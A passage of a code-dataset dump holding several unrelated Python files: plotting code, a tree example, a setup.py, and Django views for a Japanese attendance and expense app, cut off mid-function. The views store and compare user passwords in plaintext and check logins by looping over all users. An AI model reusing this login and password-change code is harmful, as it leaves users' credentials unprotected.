alt.Chart(dataframe).mark_rule(color='red').encode(x='mean(lexCount):Q')\n\np = (alt.\n Chart(dataframe).\n mark_circle(size=40).\n encode(x='lexCount', y='flesch').\n properties(height=200, width=400, title='Article length versus readability').\n interactive()\n\n)\n\np1 = p+p1Line+p2Line\n\n\n# %%\np2 = (alt.\n Chart(f).\n mark_bar().\n encode(x='cat',y='sum(Count):Q').\n properties(height=200, width=400, title='Standard reading score')\n)\n\np2asc = p2.encode(alt.X(field='cat', type='nominal', sort='y'))\n\np4 = (alt.\n Chart(dataframe).\n mark_bar().\n encode(x = 'ReadingDiff', y='count()').\n properties(height=200, width=400, title='Reading level')\n)\n\np4asc = p4.encode(alt.X(field='ReadingDiff', type='nominal', sort='y'))\n\n\n# %%\np1 & p2asc | (p3 & p4asc)\n\n\n# %%\nflesch(-9), flesch(109)\n\n\n# %%\n\n\n\n","repo_name":"CognitiveDave/nlp","sub_path":"npbook.py","file_name":"npbook.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"6229906889","text":"class TreeNode:\n def __init__(self, val):\n self.value = val\n self.left = None\n self.right = None\n\n\nroot = TreeNode(12)\nchild1 = TreeNode(11)\nchild2 = TreeNode(13)\n\nroot.left = child1\nroot.right = child2\n\nprint(root.left.value)\nprint(root.right.value)","repo_name":"kalyanchatterjee/zero","sub_path":"datastructures/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25249382313","text":"import nose2\nimport os\nimport setuptools\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetuptools.setup(\n name=\"gae-discourse-client\",\n version=\"0.0.1\",\n author=\"Thomas Davids\",\n author_email=\"thomas@udacity.com\",\n description=(\"An API client for Discourse using the Google App Engine \"\n \"framework\"),\n license=\"MIT\",\n keywords=\"google appengine discourse api client\",\n url=\"https://github.com/udacity/gae-discourse-client\",\n packages=['gae_discourse_client', 'tests', 'functional_tests'],\n test_suite='nose2.collector.collector',\n entry_points={\n \"distutils.commands\": [\n \"test_functional = test_functional:FunctionalTests\"\n ],\n },\n long_description=read('README.md'),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: BSD License\",\n ],\n)\n","repo_name":"udacity/gae-discourse-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5241420593","text":"from django.http import HttpResponse\nfrom django.template import RequestContext\nfrom app_folder.models import syain_info\nfrom app_folder.models import project_work\nfrom app_folder.models import torihikisaki_list\nfrom app_folder.models import trans_info\nfrom app_folder.models import kintai_touroku_info\nfrom app_folder.models import project_uchiwake\nfrom django.db.models import Avg, Max, Min, Sum\nfrom django.template import loader\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views import generic\n#from xoxzo.cloudpy import XoxzoClient\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.signing import BadSignature, SignatureExpired, loads,dumps\nfrom django.http import HttpResponseBadRequest\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect\nfrom django.template.loader import get_template\nfrom django.views import generic\nfrom .forms import CustomUserCreateForm\nfrom django.contrib.auth.views import LoginView\nfrom .forms import CustomLoginForm\nfrom . import utils\nimport urllib.request\n\nimport datetime\nimport calendar\nimport locale\nimport os\nimport secrets\n\n# Create your views here.\nimport webbrowser\n\nUser = get_user_model()\n\ndef index(request):\n template = loader.get_template('index.html')\n return HttpResponse(template.render( None, request))\n \ndef login(request):\n template = loader.get_template('registration/login.html')\n \n \n return HttpResponse(template.render( None, request))\n \ndef password(request):\n template = loader.get_template('registration/password_change.html')\n print('pass')\n return HttpResponse(template.render( None, request))\n \ndef passwordchange(request):\n template = loader.get_template('registration/password_change.html') \n id = request.POST.get('UserId','')\n passw =request.POST.get('Password','')\n passn =request.POST.get('APassword','')\n passk =request.POST.get('KPassword','')\n list = syain_info.objects.all()\n context = {}\n if(len(passn) < 8):\n context.update({\n 'shorterror': '新パスワードは8文字以上で入力してください',\n })\n \n if (passn != passk):\n context.update({\n 'kakuninerror': '新パスワード,確認パスワードが一致しません',\n })\n if (passn == passw):\n context.update({\n 'sameerror': '新パスワードと旧パスワードが同じです',\n })\n sameflg = False\n for i in range(len(list)):\n syaincd1=list[i].syaincd\n password1=list[i].password\n if (id != syaincd1 or passw != password1):\n continue \n sameflg = True \n if(passn == passk and passn != passw and len(passn) >= 8):\n p = syain_info.objects.filter(syaincd = syaincd1)\n print(p)\n p.update(password = passn)\n return render(request, 'registration/login.html')\n \n if not sameflg:\n context.update({\n 'matcherror': 'ユーザーidまたはパスワードが違います',\n })\n return render(request, 'registration/password_change.html', context)\n \ndef koutuhilist(request):\n template = loader.get_template('registration/koutuhi_itiran.html')\n id = request.session.get('User','')\n data = trans_info.objects.filter(syaincd = id)\n print(data)\n my_dict2 = {\n 'data': data\n }\n return render(request, 'registration/koutuhi_itiran.html', my_dict2)\n \ndef koutuhi(request):\n template = loader.get_template('registration/koutuhi.html')\n listtori = torihikisaki_list.objects.all()\n request.session['User'] = request.POST['User']\n request.session['Pass'] = request.POST['Pass']\n id = request.POST['User']\n passw = request.POST['Pass']\n \n list = syain_info.objects.all()\n secret_key = secrets.randbelow(10000)\n message = \"こちらはXOXZOです。あなたの暗証番号は %04d です\" % secret_key\n\n # APIを呼び出すための秘密鍵は、環境変数に保存されているものとします\n # SIDとTOKENは https://www.xoxzo.com/ からサインアップして入手してください\n sid = os.getenv('XOXZO_API_SID')\n auth_token = os.getenv('XOXZO_API_AUTH_TOKEN')\n\n # SMSの送信\n #xc = XoxzoClient(sid=sid, auth_token=auth_token)\n #result = xc.send_sms(message=message, recipient=\"+818050213916\", sender=\"XOXZO\")\n\n for i in range(len(list)):\n syaincd=list[i].syaincd\n password=list[i].password\n print(list[i].syaincd)\n print(list[i].password)\n if (id == syaincd and passw == password):\n context = {\n 'cus': listtori,\n 'user':id,\n }\n print('open')\n #url = \"https://amazon.co.jp\"\n #webbrowser.open(url)\n #breakpoint()\n return render(request, 'registration/koutuhi.html', context)\n context = {\n 'error': 'ユーザーIDまたはパスワードが違います',\n }\n return render(request, 'registration/login.html', context)\n \ndef koutuhisubmit(request):\n template = loader.get_template('registration/koutuhi.html')\n list = torihikisaki_list.objects.all()\n ida = request.session.get('User','')\n name = syain_info.objects.get(syaincd=ida).syainname\n torihiki = request.POST.get('torihiki', '')\n\n if request.method == 'POST':\n tourokuno = request.POST.get('tourokuno', '')\n kbn = request.POST['tourokukbn']\n date = datetime.date.today()\n \n \n startdatelist = []\n enddatelist = []\n homonlist = []\n kamokulist = []\n syudanlist = []\n transportlist = []\n seikyulist = []\n count = 0\n seisan = request.POST['seisan']\n \n \n for i in range(len(request.POST.getlist('homonlist', None))):\n start = request.POST.getlist('startdatelist', None)[i]\n end = request.POST.getlist('enddatelist', None)[i]\n startstr = start[:4] + '-' + start[4:6] + '-' + start[6:]\n endstr = end[:4] + '-' + end[4:6] + '-' + end[6:]\n homon = request.POST.getlist('homonlist', None)[i]\n kamoku = request.POST.getlist('kamokulist', None)[i]\n syudan = request.POST.getlist('syudanlist', None)[i]\n transport = request.POST.getlist('transportlist', None)[i]\n seikyu = request.POST.getlist('seikyulist', None)[i]\n print(range(len(request.POST.getlist('homonlist', None))))\n print(i)\n startdatelist.append(startstr)\n enddatelist.append(endstr)\n homonlist.append(homon)\n kamokulist.append(kamoku)\n syudanlist.append(syudan)\n transportlist.append(transport)\n seikyulist.append(seikyu)\n\n tourokuid = '10' + str(trans_info.objects.count())\n\n \n if (kbn == '削除'):\n print('delete')\n b = trans_info.objects.filter(tourokuno = str(tourokuno))\n b.delete()\n if (kbn == '修正'):\n print('update')\n b = trans_info.objects.filter(tourokuno = str(tourokuno))\n b.update(tourokukbn = kbn,tourokudate = date,customname = torihiki,homon = homonlist[i],tourokuno = tourokuid,\n startdate = startdatelist[i], enddate = startdatelist[i],kamoku = kamokulist[i], \n syudan = syudanlist[i],transport = transportlist[i], k_seikyu = seikyulist[0], seisan_kbn = seisan)\n if (kbn == '登録'):\n print('set')\n b = trans_info(syaincd = ida,syainname = name,tourokukbn = kbn,customname = torihiki, tourokudate = date,\n homon = homonlist[i],tourokuno = tourokuid, startdate = startdatelist[i], enddate = startdatelist[i],\n kamoku = kamokulist[i], syudan = syudanlist[i],transport = transportlist[i], k_seikyu = seikyulist[0], \n seisan_kbn = seisan)\n b.save()\n cus = {\n 'cus': list,\n 'message': '処理が完了しました',\n }\n return render(request, 'registration/koutuhi.html', cus)\ndef appearrance(request):\n template = loader.get_template('registration/syukketsusentaku.html')\n return HttpResponse(template.render( None, request))\n\n\n# 一覧出力画面(年月選択前)\ndef output(request):\n template = loader.get_template('registration/output_ichiran.html')\n \n return HttpResponse(template.render( None, request))\n\n# 一覧出力画面(年月選択後)\ndef output2(request):\n \n datelist = []\n weeklist = []\n monthyear =request.POST['monthselect']\n year = monthyear[:4]\n month = monthyear[5:7]\n monthz = monthyear[5:6]\n ida = request.session.get('User','')\n\n # 選択月の0埋めを無効化\n month_range = calendar.monthrange(int(year), int(month))\n \n listf = kintai_touroku_info.objects.filter(ymd__month = month,syaincd = ida).order_by('ymd')\n listmmm = []\n listweek = []\n \n locale.setlocale(locale.LC_TIME, 'ja_JP.UTF-8')\n # 日数分ループ\n for i in range(1,month_range[1] + 1):\n listmmm.append(i)\n date = datetime.date(int(year), int(month),i)\n print(date.strftime('%a'))\n listweek.append(i)\n \n \n # DB格納日数分ループ\n for i in range(len(listf)):\n mmmm = listf[i].ymd.day\n listmmm[mmmm - 1] = listf[i] # DBのデータ格納\n \n\n # DB未格納箇所を日付型に変換\n for i in range(1,month_range[1] + 1):\n if i in listmmm:\n listmmm[i - 1] = str(year) + str(month) + str(format(i, '02'))\n listmmm[i - 1] = datetime.datetime.strptime(listmmm[i - 1], '%Y%m%d')\n\n # 休暇理由、届出種類を数値から日本語に変換\n for i in range(len(listf)):\n kanmaflg = False\n if (listf[i].holidayriyu == \"0\"):\n listf[i].holidayriyu = str(listf[i].holidayriyu)\n listf[i].holidayriyu = \"\"\n \n \n if (listf[i].todoke_tikoku == 0):\n listf[i].todoke_tikoku = str(listf[i].todoke_tikoku)\n listf[i].todoke_tikoku = \"\"\n \n if (listf[i].todoke_soutai == 0):\n listf[i].todoke_soutai = str(listf[i].todoke_soutai)\n listf[i].todoke_soutai = \"\"\n \n if (listf[i].todoke_midnight == 0):\n listf[i].todoke_midnight = str(listf[i].todoke_midnight)\n listf[i].todoke_midnight = \"\"\n \n if (listf[i].todoke_hayade == 0):\n listf[i].todoke_hayade = str(listf[i].todoke_hayade)\n listf[i].todoke_hayade = \"\"\n \n if (listf[i].todoke_irregular == 0):\n listf[i].todoke_irregular = str(listf[i].todoke_irregular)\n listf[i].todoke_irregular = \"\"\n \n if (listf[i].todoke_holiwork == 0):\n listf[i].todoke_holiwork = str(listf[i].todoke_holiwork)\n listf[i].todoke_holiwork = \"\"\n \n if (listf[i].todoke_tikoku == 1):\n listf[i].todoke_tikoku = str(listf[i].todoke_tikoku)\n listf[i].todoke_tikoku = \"遅刻\"\n kanmaflg = True\n if (listf[i].todoke_soutai == 1):\n listf[i].todoke_soutai = str(listf[i].todoke_soutai)\n if kanmaflg:\n listf[i].todoke_soutai = \",早退\"\n else:\n listf[i].todoke_soutai = \"早退\"\n kanmaflg = True\n \n if (listf[i].todoke_midnight == 1):\n listf[i].todoke_midnight = str(listf[i].todoke_midnight)\n if kanmaflg:\n listf[i].todoke_midnight = \",深夜\"\n else:\n listf[i].todoke_midnight = \"深夜\"\n kanmaflg = True\n \n if (listf[i].todoke_hayade == 1):\n listf[i].todoke_hayade = str(listf[i].todoke_hayade)\n if kanmaflg:\n listf[i].todoke_hayade = \",早出\"\n else:\n listf[i].todoke_hayade = \"早出\"\n kanmaflg = True\n \n if (listf[i].todoke_irregular == 1):\n listf[i].todoke_irregular = str(listf[i].todoke_irregular)\n if kanmaflg:\n listf[i].todoke_irregular = \",変則出勤\"\n else:\n listf[i].todoke_irregular = \"変則出勤\"\n kanmaflg = True\n \n if (listf[i].todoke_holiwork == 1):\n listf[i].todoke_holiwork = str(listf[i].todoke_holiwork)\n if kanmaflg:\n listf[i].todoke_holiwork = \",休日出勤\"\n else:\n listf[i].todoke_holiwork = \"休日出勤\"\n\n locale.setlocale(locale.LC_TIME, 'ja_JP.UTF-8')\n sumwork = float(0.0);\n overwork = float(0.0);\n resttime = float(0.0);\n \n for l in listf:\n sumwork = sumwork + float(l.worktime)\n overwork = overwork + float(l.overtime)\n resttime = resttime + float(l.resttime)\n \n sumwork = round(sumwork,2)\n overwork = round(overwork,2)\n resttime = round(resttime,2)\n context = {\n 'monthselect' : monthyear,\n 'listaaaa': listmmm,\n 'sumwork': sumwork,\n 'overwork': overwork,\n 'resttime': resttime,\n }\n return render(request, 'registration/output_ichiran.html', context)\n \n\ndef project(request):\n template = loader.get_template('registration/projecttouroku.html')\n list = project_work.objects.all().distinct('projectname')\n projectselect1 = request.session.get('project1', '')\n projectselect2 = request.session.get('project2', '')\n projectselect3 = request.session.get('project3', '')\n projectselect4 = request.session.get('project4', '')\n request.session['abs'] = request.POST.get('absproject', '')\n request.session['chikoku'] = request.POST.get('chikokuproject', '')\n request.session['hayade'] = request.POST.get('hayadeproject', '')\n request.session['soutai'] = request.POST.get('soutaiproject', '')\n request.session['hensoku'] = request.POST.get('hensokuproject', '')\n request.session['midnight'] = request.POST.get('midnightproject', '')\n request.session['holiday'] = request.POST.get('holidayproject', '')\n request.session['holidaykbn'] = request.POST.get('holidaykbnproject', '')\n request.session['riyu'] = request.POST.get('riyuproject', '')\n request.session['starttime'] = request.POST.get('starttime', '')\n request.session['endtime'] = request.POST.get('endtime', '')\n request.session['overtime'] = request.POST.get('overtime', '')\n cont = {\n 'pro': list,\n 'projectselect1': projectselect1,\n 'projectselect2': projectselect2,\n 'projectselect3': projectselect3,\n 'projectselect4': projectselect4,\n }\n return render(request, 'registration/projecttouroku.html', context=cont)\n \n# 出欠選択画面\ndef kintaiabs(request):\n template = loader.get_template('registration/kintai.html')\n request.session['Absentkbn'] = request.POST['Absentkbn']\n abskbn = \"\"\n \n kbn = request.POST.get('holidaykbn', '')\n abs = request.POST.get('Absentkbn', '')\n if (abs == '0'):\n abskbn = \"出勤\"\n if (abs == '1'):\n abskbn = \"欠勤\"\n \n context = {}\n if(abs == ''):\n context.update({\n 'riyuerror': '出欠区分を選択してください',\n })\n return render(request, 'registration/syukketsusentaku.html', context)\n \n\n riyu = request.POST.get('riyu', '')\n \n chikoku = request.POST['Todokede0']\n hayade = request.POST['Todokede1']\n soutai = request.POST['Todokede2']\n hensoku = request.POST['Todokede3']\n midnight = request.POST['Todokede4']\n holiday = request.POST['Todokede5']\n \n\n value1 = project_work.objects.filter(projectname=request.session.get('touroku1', '')).distinct('kouteiname')\n value2 = project_work.objects.filter(projectname=request.session.get('touroku2', '')).distinct('kouteiname')\n value3 = project_work.objects.filter(projectname=request.session.get('touroku3', '')).distinct('kouteiname')\n if(abs == '1' and (kbn == '' or riyu == '')):\n if(kbn == ''):\n context.update({\n 'holierror': '休暇区分を選択してください',\n })\n if(riyu == ''):\n context.update({\n 'riyuerror': '休暇理由を選択してください',\n })\n return render(request, 'registration/syukketsusentaku.html', context)\n kanmaflg = False\n \n if(chikoku != ''):\n kanmaflg = True\n if(hayade != ''):\n if kanmaflg:\n hayade = ',早出有'\n else:\n hayade = '早出有' \n kanmaflg = True\n \n if(soutai != ''):\n if kanmaflg:\n soutai = ',早退'\n else:\n soutai = '早退' \n kanmaflg = True\n \n if(hensoku != ''):\n if kanmaflg:\n hensoku = ',変則勤務'\n else:\n hensoku = '変則勤務' \n kanmaflg = True\n \n if(midnight!= ''):\n if kanmaflg:\n midnight= ',深夜有'\n else:\n midnight= '深夜有' \n kanmaflg = True\n \n if(holiday!= ''):\n if kanmaflg:\n holiday= ',休日出勤'\n else:\n holiday= '休日出勤' \n kanmaflg = True\n\n context = {\n 'ymd': request.session.get('dateselect', ''),\n 'starttime': request.session.get('starttime', ''),\n 'endtime': request.session.get('endtime', ''),\n 'overtime': request.session.get('overtime', ''),\n 'projectname1': request.session.get('touroku1', ''),\n 'projectname2': request.session.get('touroku2', ''),\n 'projectname3': request.session.get('touroku3', ''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'abs' : abskbn,\n 'chikoku' : chikoku,\n 'hayade' : hayade,\n 'soutai' : soutai,\n 'hensoku' : hensoku,\n 'midnight': midnight,\n 'holiday' : holiday,\n }\n return render(request, 'registration/kintai.html', context)\n\n \ndef kintaiproject(request):\n template = loader.get_template('registration/kintai.html')\n dateselect = request.session.get('dateselect', '')\n abs = request.session.get('abs', '')\n hol = request.session.get('holidaykbn','')\n riyu = request.session.get('riyu','')\n todo0 = request.session.get('chikoku','')\n todo1 = request.session.get('hayade','')\n todo2 = request.session.get('soutai','')\n todo3 = request.session.get('hensoku','')\n todo4 = request.session.get('midnight','')\n todo5 = request.session.get('holiday','')\n ida = request.session.get('User','')\n \n value = project_work.objects.all().distinct('workname')\n value1 = project_work.objects.filter(projectname=request.POST['touroku1']).distinct('kouteiname')\n value2 = project_work.objects.filter(projectname=request.POST['touroku2']).distinct('kouteiname')\n value3 = project_work.objects.filter(projectname=request.POST['touroku3']).distinct('kouteiname')\n value4 = project_work.objects.filter(projectname=request.POST['touroku4']).distinct('kouteiname') \n \n touroku1 = request.POST['touroku1']\n touroku2 = request.POST['touroku2']\n touroku3 = request.POST['touroku3']\n touroku4 = request.POST['touroku4']\n print(\"touroku1 \" + touroku1)\n request.session['touroku1'] = request.POST['touroku1']\n request.session['touroku2'] = request.POST['touroku2']\n request.session['touroku3'] = request.POST['touroku3']\n request.session['touroku4'] = request.POST['touroku4']\n if request.method == 'POST':\n context = {\n 'ymd': dateselect,\n 'starttime': request.session.get('starttime', ''),\n 'endtime': request.session.get('endtime', ''),\n 'overtime': request.session.get('overtime', ''),\n 'projectname1': touroku1,\n 'projectname2': touroku2,\n 'projectname3': touroku3,\n 'projectname4': touroku4,\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'abs': abs,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'user' : ida,\n }\n return render(request, 'registration/kintai.html', context)\n return HttpResponse(template.render( None, request))\n \n#勤怠登録押下、工程選択時 \ndef kintaitouroku(request):\n template = loader.get_template('registration/kintai.html')\n btt = request.POST.get('btnExecH','')\n abs = request.POST.get('abs','')\n nowyear = str(datetime.date.today().year)\n nowmonth = str(format(datetime.date.today().month,'02'))\n nowday = str(format(datetime.date.today().day,'02'))\n nowdate = nowyear + \"-\" + nowmonth + \"-\" + nowday\n timestr = request.POST.get('dateselect',nowdate)\n \n ida = request.session.get('User','')\n listf = kintai_touroku_info.objects.filter(ymd = timestr,syaincd = ida)\n errflg = False\n context = {} \n syainname = syain_info.objects.all() \n start = request.POST.get('starttime', '')\n end = request.POST.get('endtime', '')\n over = request.POST.get('overtime', '')\n\n tourokuope = request.POST.get('tourokuope','')\n if(tourokuope != ''):\n t1 = request.POST.get('project1','')\n t2 = request.POST.get('project2','')\n t3 = request.POST.get('project3','')\n t4 = request.POST.get('project4','')\n request.session['project1'] = request.POST.get('project1','')\n request.session['project2'] = request.POST.get('project2','')\n request.session['project3'] = request.POST.get('project3','')\n request.session['project4'] = request.POST.get('project4','')\n else:\n t1 = request.POST.get('projectname1','')\n t2 = request.POST.get('projectname2','')\n t3 = request.POST.get('projectname3','')\n t4 = request.POST.get('projectname4','')\n \n pcd1 = project_work.objects.filter(projectname = t1)\n pcd2 = project_work.objects.filter(projectname = t2)\n pcd3 = project_work.objects.filter(projectname = t3)\n pcd4 = project_work.objects.filter(projectname = t4)\n \n if (len(pcd1) != 0):\n projectcd1 = pcd1[0].projectcd\n else:\n projectcd1 = \"\"\n print(\"projectcd1\" + projectcd1)\n \n if (len(pcd2) != 0):\n projectcd2 = pcd2[0].projectcd\n else:\n projectcd2 = \"\"\n print(\"projectcd2\" + projectcd2)\n \n if (len(pcd3) != 0):\n projectcd3 = pcd3[0].projectcd\n else:\n projectcd3 = \"\"\n print(\"projectcd3\" + projectcd3)\n \n if (len(pcd4) != 0):\n projectcd4 = pcd4[0].projectcd\n else:\n projectcd4 = \"\"\n print(\"projectcd4\" + projectcd4)\n\n koutei1 = request.POST.get('kouteiname1','')\n koutei2 = request.POST.get('kouteiname2','')\n koutei3 = request.POST.get('kouteiname3','')\n koutei4 = request.POST.get('kouteiname4','')\n kcd1 = project_work.objects.filter(kouteiname = koutei1)\n kcd2 = project_work.objects.filter(kouteiname = koutei2)\n kcd3 = project_work.objects.filter(kouteiname = koutei3)\n kcd4 = project_work.objects.filter(kouteiname = koutei4)\n if (len(kcd1) != 0):\n kouteicd1 = kcd1[0].kouteicd\n else:\n kouteicd1 = \"\"\n \n if (len(kcd2) != 0):\n kouteicd2 = kcd2[0].kouteicd\n else:\n kouteicd2 = \"\"\n \n if (len(kcd3) != 0):\n kouteicd3 = kcd3[0].kouteicd\n else:\n kouteicd3 = \"\"\n \n if (len(kcd4) != 0):\n kouteicd4 = kcd4[0].kouteicd\n else:\n kouteicd4 = \"\"\n \n gyomuselect1 = request.POST.get('workname1','')\n gyomuselect2 = request.POST.get('workname2','')\n gyomuselect3 = request.POST.get('workname3','')\n gyomuselect4 = request.POST.get('workname4','')\n gcd1 = project_work.objects.filter(workname = gyomuselect1)\n gcd2 = project_work.objects.filter(workname = gyomuselect2)\n gcd3 = project_work.objects.filter(workname = gyomuselect3)\n gcd4 = project_work.objects.filter(workname = gyomuselect4)\n \n if (len(gcd1) != 0):\n workcd1 = gcd1[0].workcd\n else:\n workcd1 = \"\"\n print(\"workcd1\" + workcd1)\n \n if (len(gcd2) != 0):\n workcd2 = gcd2[0].workcd\n else:\n workcd2 = \"\"\n print(\"workcd2\" + workcd2)\n \n if (len(gcd3) != 0):\n workcd3 = gcd3[0].workcd\n else:\n workcd3 = \"\"\n print(\"workcd3\" + workcd3)\n \n if (len(gcd4) != 0):\n workcd4 = gcd4[0].workcd\n else:\n workcd4 = \"\"\n print(\"workcd4\" + workcd4)\n \n value1 = project_work.objects.filter(projectname=t1).distinct('kouteiname')\n value2 = project_work.objects.filter(projectname=t2).distinct('kouteiname')\n value3 = project_work.objects.filter(projectname=t3).distinct('kouteiname')\n value4 = project_work.objects.filter(projectname=t4).distinct('kouteiname')\n gyomu1 = project_work.objects.filter(projectname=t1,kouteiname=koutei1)\n gyomu2 = project_work.objects.filter(projectname=t2,kouteiname=koutei2)\n gyomu3 = project_work.objects.filter(projectname=t3,kouteiname=koutei3)\n gyomu4 = project_work.objects.filter(projectname=t4,kouteiname=koutei4)\n \n starttime1 = request.POST.get('starttime1','00:00')\n starttime2 = request.POST.get('starttime2','00:00')\n starttime3 = request.POST.get('starttime3','00:00')\n starttime4 = request.POST.get('starttime4','00:00')\n endtime1 = request.POST.get('endtime1','00:00')\n endtime2 = request.POST.get('endtime2','00:00')\n endtime3 = request.POST.get('endtime3','00:00')\n endtime4 = request.POST.get('endtime4','00:00')\n resttime1 = request.POST.get('resttime1','0')\n resttime2 = request.POST.get('resttime2','0')\n resttime3 = request.POST.get('resttime3','0')\n resttime4 = request.POST.get('resttime4','0')\n\n hol = request.POST.get('holidaykbn','')\n riyu = request.POST.get('riyu','')\n todo0 = request.POST.get('chikoku','')\n todo1 = request.POST.get('hayade','')\n todo2 = request.POST.get('soutai','')\n todo3 = request.POST.get('hensoku','')\n todo4 = request.POST.get('midnight','')\n todo5 = request.POST.get('holiday','')\n\n if(btt != '勤怠登録'):\n\n if (abs == '欠勤'):\n context = {\n 'ymd': timestr,\n 'abs': abs,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'holidaykbn': hol,\n 'riyu' : riyu, \n 'user' : ida,\n }\n return render(request, 'registration/kintai.html', context)\n\n request.session['kouteiname1'] = request.POST.get('kouteiname1','')\n request.session['kouteiname2'] = request.POST.get('kouteiname2','')\n request.session['kouteiname3'] = request.POST.get('kouteiname3','')\n request.session['kouteiname4'] = request.POST.get('kouteiname4','')\n context = {\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'ymd': timestr,\n 'abs': abs,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'holidaykbn': hol,\n 'riyu' : riyu, \n 'user' : ida,\n }\n return render(request, 'registration/kintai.html', context)\n\n name = syain_info.objects.get(syaincd=ida).syainname\n worktime = 0.0\n rest = 0.0\n holdb = 0\n todok = 0\n if(hol == \"取得なし\"):\n holdb = 0\n \n if(hol == \"有給休暇\"):\n holdb = 1\n\n if(hol == \"特休・その他休暇\"):\n holdb = 2\n\n if(hol == \"代休\"):\n holdb = 3\n \n if(hol == \"その他\"):\n holdb = 4\n \n if(hol == \"半休等\"):\n holdb = 5\n \n if(abs == '出勤'):\n absdb = 0\n if(abs == '欠勤'):\n absdb = 1\n \n\n\n if(abs == '出勤' or abs == ''):\n \n if (resttime1 == ''):\n resttime1 = 0\n if (resttime2 == ''):\n resttime2 = 0\n if (resttime3 == ''):\n resttime3 = 0\n if (resttime4 == ''):\n resttime4 = 0\n resttime = float(resttime1) + float(resttime2) + float(resttime3) + float(resttime4)\n midtime = 0\n midover = 0\n paidtime = 0\n morningtime = 0\n \n if( abs == '' ):\n context.update({\n 'absnerror': '出欠選択されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n print('abserror')\n errflg = True\n\n if(t1 == '' and t2 == '' and t3 == '' and t4 == ''):\n context.update({\n 'projecterror': 'プロジェクト登録をしてください',\n 'ymd': timestr,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'user' : ida,\n })\n errflg = True\n \n if( (t1 != '' and starttime1 == '') or (t2 != '' and starttime2 == '') or (t3 != '' and starttime3 == '') or (t4 != '' and starttime4 == '') ):\n context.update({\n 'starterror': '開始時刻が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': 